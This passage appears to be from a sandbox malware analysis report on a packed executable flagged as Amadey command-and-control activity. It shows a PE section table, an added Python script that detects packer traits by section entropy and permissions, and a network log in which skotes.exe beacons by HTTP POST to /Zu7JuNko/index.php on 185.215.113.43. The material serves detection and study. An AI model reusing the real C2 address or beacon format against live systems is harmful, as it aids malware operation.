                                                .idata | 0x6a000 | 0x1000 | 0x200 | cc76e3822efdc911f469a3e3cc9ce9fe | False | 0.1484375 | data | 1.0428145631430756 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                (unnamed) | 0x6b000 | 0x2aa000 | 0x200 | d317ae2e3ebecca69c3c098d7b674377 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                iaxkupqh | 0x315000 | 0x19b000 | 0x19a600 | 4f37c619245b05941a0608408ebdb47b | False | 0.9948247839247639 | data | 7.954913292155413 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                fnhucfqp | 0x4b0000 | 0x1000 | 0x400 | 939382e64d58f151975997b8efda0f62 | False | 0.8017578125 | data | 6.222567992963912 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .taggant | 0x4b1000 | 0x3000 | 0x2200 | 0597c029dc45930e2075ec18b1569e91 | False | 0.07674632352941177 | DOS executable (COM) | 0.8090136675948747 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                RT_MANIFEST | 0x69070 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
                                                RT_MANIFEST | 0x691c4 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727
                                                DLL | Import
                                                kernel32.dll | lstrcpy
                                                Language of compilation system | Country where language is spoken | Map
                                                English | United States |
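The section table above is what a practitioner reads as a packer footprint: every executable section is also writable, the unnamed section at 0x1000 and the random-named iaxkupqh section have entropy of 7.99 and 7.95, the unnamed section at 0x6b000 occupies 0x200 bytes on disk but 0x2aa000 bytes in memory, and the import table names a single function (kernel32.dll!lstrcpy) while the IAT directory is empty. The script below is an added example, not part of the Joe Sandbox report and not code from the sample: it walks the section headers, computes the same per-section Shannon entropy and flags those indicators. The fixture it runs on is constructed and scaled down (the names, sizes and the 7.0 entropy threshold are assumptions for illustration), so the values it prints are not those of file.exe.

```python
"""Added example (stdlib only, not from the report): walk the PE section table,
score each section's Shannon entropy and flag the packer tell-tales visible in
the table above. SAMPLE_PE is a constructed, scaled-down fixture, not file.exe."""
import math
import random
import struct
from collections import Counter

SCN_INIT_DATA, SCN_EXEC, SCN_READ, SCN_WRITE = 0x40, 0x20000000, 0x40000000, 0x80000000
RWX = SCN_INIT_DATA | SCN_EXEC | SCN_READ | SCN_WRITE
RW = SCN_INIT_DATA | SCN_READ | SCN_WRITE
FILE_ALIGN, SECTION_ALIGN = 0x200, 0x1000
# Names a mainstream linker emits; empty or random names are worth a look.
STANDARD_NAMES = {".text", ".rdata", ".data", ".idata", ".edata", ".rsrc",
                  ".reloc", ".pdata", ".bss", ".tls", ".CRT"}

def shannon_entropy(data):
    """Bits per byte in 0.0..8.0; values near 8 mean compressed or encrypted."""
    if not data:
        return 0.0
    n = len(data)
    return max(0.0, -sum(c / n * math.log2(c / n) for c in Counter(data).values()))

def _align(value, boundary):
    return (value + boundary - 1) // boundary * boundary

def parse_sections(pe):
    """Yield (name, virtual_size, virtual_address, raw_bytes, characteristics)."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                    # IMAGE_FILE_HEADER
    count = struct.unpack_from("<H", pe, coff + 2)[0]      # NumberOfSections
    opt_size = struct.unpack_from("<H", pe, coff + 16)[0]  # SizeOfOptionalHeader
    table = coff + 20 + opt_size                           # first IMAGE_SECTION_HEADER
    for i in range(count):
        name, vsize, vaddr, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            "<8sIIIIIIHHI", pe, table + 40 * i)
        name = name.rstrip(b"\0").decode("ascii", "replace")
        yield name, vsize, vaddr, pe[raw_ptr:raw_ptr + raw_size], chars

def assess_sections(pe, entropy_threshold=7.0):
    """Return one dict per section listing the indicators that fired."""
    rows = []
    for name, vsize, vaddr, raw, chars in parse_sections(pe):
        ent = shannon_entropy(raw)
        flags = []
        if chars & SCN_EXEC and chars & SCN_WRITE:
            flags.append("rwx")
        if ent >= entropy_threshold:
            flags.append("high-entropy")
        if name not in STANDARD_NAMES:
            flags.append("nonstandard-name")
        if vsize > 8 * max(len(raw), FILE_ALIGN):  # 0x200 on disk, 0x2aa000 in memory
            flags.append("virtual-only")
        rows.append({"name": name, "vaddr": vaddr, "vsize": vsize, "raw_size": len(raw),
                     "entropy": round(ent, 3), "flags": flags})
    return rows

def build_sample_pe(sections):
    """Assemble a minimal PE32 from (name, virtual_size, raw_bytes, characteristics);
    only the fields parse_sections() reads are filled in, so it is not loadable."""
    opt_size = 0xE0
    hdr_len = _align(0x40 + 4 + 20 + opt_size + 40 * len(sections), FILE_ALIGN)
    dos = bytearray(b"MZ".ljust(0x40, b"\0"))
    struct.pack_into("<I", dos, 0x3C, 0x40)                        # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    headers, bodies, vaddr, raw_ptr = bytearray(), bytearray(), SECTION_ALIGN, hdr_len
    for name, vsize, raw, chars in sections:
        raw_size = _align(len(raw), FILE_ALIGN)
        headers += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"), vsize,
                               vaddr, raw_size, raw_ptr, 0, 0, 0, 0, chars)
        bodies += raw.ljust(raw_size, b"\0")
        vaddr += _align(max(vsize, 1), SECTION_ALIGN)
        raw_ptr += raw_size
    image = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(headers)
    return image.ljust(hdr_len, b"\0") + bytes(bodies)

def _pseudo_random(n, seed):
    rng = random.Random(seed)                  # deterministic stand-in for packed bytes
    return bytes(rng.getrandbits(8) for _ in range(n))

MANIFEST = (b'<?xml version="1.0" encoding="UTF-8" standalone="yes"?>\r\n'
            b'<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">\r\n'
            b'</assembly>\r\n')
# Constructed fixture echoing the shape of the table above: an unnamed RWX stub, .rsrc,
# .idata, an RWX section with 0x200 bytes on disk but 0x2aa000 in memory, and a
# random-named RWX section of high-entropy data. Sizes are scaled down.
SAMPLE_PE = build_sample_pe([
    ("", 0x1000, _pseudo_random(0x1000, seed=1), RWX),
    (".rsrc", len(MANIFEST), MANIFEST, RW),
    (".idata", 0x100, b"\0" * 0x60 + b"kernel32.dll\0lstrcpy\0" + b"\0" * 0x60, RW),
    ("", 0x2aa000, b"\0" * 0x200, RWX),
    ("iaxkupqh", 0x2000, _pseudo_random(0x2000, seed=2), RWX),
])

if __name__ == "__main__":
    for row in assess_sections(SAMPLE_PE):
        print(f'{row["name"] or "<unnamed>":10} vsize=0x{row["vsize"]:06x} '
              f'raw=0x{row["raw_size"]:05x} H={row["entropy"]:.3f} {row["flags"]}')
```

Run stand-alone it prints one line per section of the fixture with its entropy and the indicators that fired. The "virtual-only" check is the one worth keeping in mind when reading the table: a section that is almost empty on disk but hundreds of kilobytes in memory is the buffer the stub will unpack into, which is why the entry point and the unpacked code end up outside the standard sections.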
                                                Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                2024-11-24T02:23:07.289907+0100 | 2856147 | ETPRO MALWARE Amadey CnC Activity M3 | 1 | 192.168.2.6 | 49852 | 185.215.113.43 | 80 | TCP
                                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                Nov 24, 2024 02:23:05.790829897 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:05.910586119 CET | 80 | 49852 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:05.911155939 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:05.911398888 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:06.030788898 CET | 80 | 49852 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:07.289686918 CET | 80 | 49852 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:07.289906979 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:08.797889948 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:08.798258066 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:08.917701006 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:08.917715073 CET | 80 | 49852 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:08.917905092 CET | 49852 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:08.917922020 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:08.918174982 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:09.037600040 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:10.278426886 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:10.278500080 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:11.907174110 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:11.907628059 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:12.026959896 CET | 80 | 49861 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:12.027034044 CET | 49861 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:12.027091980 CET | 80 | 49869 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:12.027192116 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:12.027440071 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:12.146830082 CET | 80 | 49869 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:13.404376984 CET | 80 | 49869 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:13.404489994 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:14.907243967 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:14.907609940 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:15.026998043 CET | 80 | 49869 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:15.027048111 CET | 80 | 49875 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:15.027074099 CET | 49869 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:15.027120113 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:15.027318954 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:15.146753073 CET | 80 | 49875 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:16.419018984 CET | 80 | 49875 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:16.419154882 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.050060034 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.050399065 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.170028925 CET | 80 | 49886 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:18.170042992 CET | 80 | 49875 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:18.170248985 CET | 49875 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.170254946 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.170521975 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:18.290054083 CET | 80 | 49886 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:19.548300028 CET | 80 | 49886 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:19.552217007 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.063821077 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.064207077 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.183532000 CET | 80 | 49886 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:21.183641911 CET | 49886 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.183655977 CET | 80 | 49892 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:21.183738947 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.183948994 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:21.303340912 CET | 80 | 49892 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:22.519133091 CET | 80 | 49892 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:22.519207001 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.141606092 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.141865969 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.261298895 CET | 80 | 49900 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:24.261316061 CET | 80 | 49892 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:24.261429071 CET | 49892 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.261435986 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.261709929 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:24.381078005 CET | 80 | 49900 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:25.604116917 CET | 80 | 49900 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:25.604293108 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.110852957 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.111263037 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.230796099 CET | 80 | 49900 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:27.230890036 CET | 49900 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.230901957 CET | 80 | 49910 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:27.230982065 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.240940094 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:27.360395908 CET | 80 | 49910 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:28.664896965 CET | 80 | 49910 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:28.668133020 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.300632000 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.301898003 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.420723915 CET | 80 | 49910 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:30.420845985 CET | 49910 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.421456099 CET | 80 | 49916 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:30.421547890 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.421768904 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:30.541213036 CET | 80 | 49916 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:31.798350096 CET | 80 | 49916 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:31.798424006 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.313546896 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.313905954 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.433547020 CET | 80 | 49923 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:33.433649063 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.433779955 CET | 80 | 49916 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:33.433835983 CET | 49916 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.433871031 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:33.553374052 CET | 80 | 49923 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:34.773086071 CET | 80 | 49923 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:34.773163080 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.391622066 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.391997099 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.511497021 CET | 80 | 49923 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:36.511571884 CET | 80 | 49933 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:36.511599064 CET | 49923 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.511646986 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.511797905 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:36.631269932 CET | 80 | 49933 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:37.900830030 CET | 80 | 49933 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:37.900966883 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.407180071 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.407635927 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.527213097 CET | 80 | 49933 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:39.527255058 CET | 80 | 49939 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:39.527291059 CET | 49933 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.527405024 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.528475046 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:39.648003101 CET | 80 | 49939 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:40.908083916 CET | 80 | 49939 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:40.908196926 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.534626007 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.534941912 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.654375076 CET | 80 | 49939 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:42.654401064 CET | 80 | 49947 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:42.654464006 CET | 49939 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.654479027 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.654645920 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:42.774024010 CET | 80 | 49947 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:44.030520916 CET | 80 | 49947 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:44.030580044 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.532176018 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.532553911 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.651959896 CET | 80 | 49947 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:45.652040958 CET | 80 | 49956 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:45.652066946 CET | 49947 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.652144909 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.652378082 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:45.771945953 CET | 80 | 49956 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:46.997339964 CET | 80 | 49956 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:47.000190020 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.625961065 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.626307011 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.745793104 CET | 80 | 49956 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:48.745805979 CET | 80 | 49962 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:48.745862007 CET | 49956 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.745913982 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.746124029 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:48.865534067 CET | 80 | 49962 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:50.132993937 CET | 80 | 49962 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:50.133121014 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.643630981 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.643913984 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.763387918 CET | 80 | 49972 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:51.763473034 CET | 80 | 49962 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:51.763475895 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.763555050 CET | 49962 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.763736963 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:51.883196115 CET | 80 | 49972 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:53.163110971 CET | 80 | 49972 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:53.163187981 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:54.782273054 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:54.782682896 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:54.902151108 CET | 80 | 49972 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:54.902165890 CET | 80 | 49980 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:54.902218103 CET | 49972 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:54.902283907 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:54.902472019 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:55.021827936 CET | 80 | 49980 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:56.278815985 CET | 80 | 49980 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:56.278917074 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:57.829103947 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:57.829386950 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:57.948894978 CET | 80 | 49986 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:57.948934078 CET | 80 | 49980 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:57.949018002 CET | 49980 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:57.949043036 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:57.949256897 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:23:58.068680048 CET | 80 | 49986 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:59.331363916 CET | 80 | 49986 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:23:59.332221985 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:00.971786976 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:00.972152948 CET | 49996 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:01.091670036 CET | 80 | 49996 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:24:01.091758013 CET | 49996 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:01.091866016 CET | 80 | 49986 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:24:01.092000961 CET | 49996 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:01.092040062 CET | 49986 | 80 | 192.168.2.6 | 185.215.113.43
                                                Nov 24, 2024 02:24:01.211548090 CET | 80 | 49996 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:24:02.479404926 CET | 80 | 49996 | 185.215.113.43 | 192.168.2.6
                                                Nov 24, 2024 02:24:02.480348110 CET | 49996 | 80 | 192.168.2.6 | 185.215.113.43
                                                • 185.215.113.43
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.2.6 | 49852 | 185.215.113.43 | 80 | 5588 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 24, 2024 02:23:05.911398888 CET | 156 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 4
                                                Cache-Control: no-cache
                                                Data Raw: 73 74 3d 73
                                                Data Ascii: st=s
                                                Nov 24, 2024 02:23:07.289686918 CET | 219 | IN | HTTP/1.1 200 OK
                                                Server: nginx/1.18.0 (Ubuntu)
                                                Date: Sun, 24 Nov 2024 01:23:07 GMT
                                                Content-Type: text/html; charset=UTF-8
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                Refresh: 0; url = Login.php
                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: 1 0


                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                1 | 192.168.2.6 | 49861 | 185.215.113.43 | 80 | 5588 | C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Nov 24, 2024 02:23:08.918174982 CET | 314 | OUT | POST /Zu7JuNko/index.php HTTP/1.1
                                                Content-Type: application/x-www-form-urlencoded
                                                Host: 185.215.113.43
                                                Content-Length: 160
                                                Cache-Control: no-cache
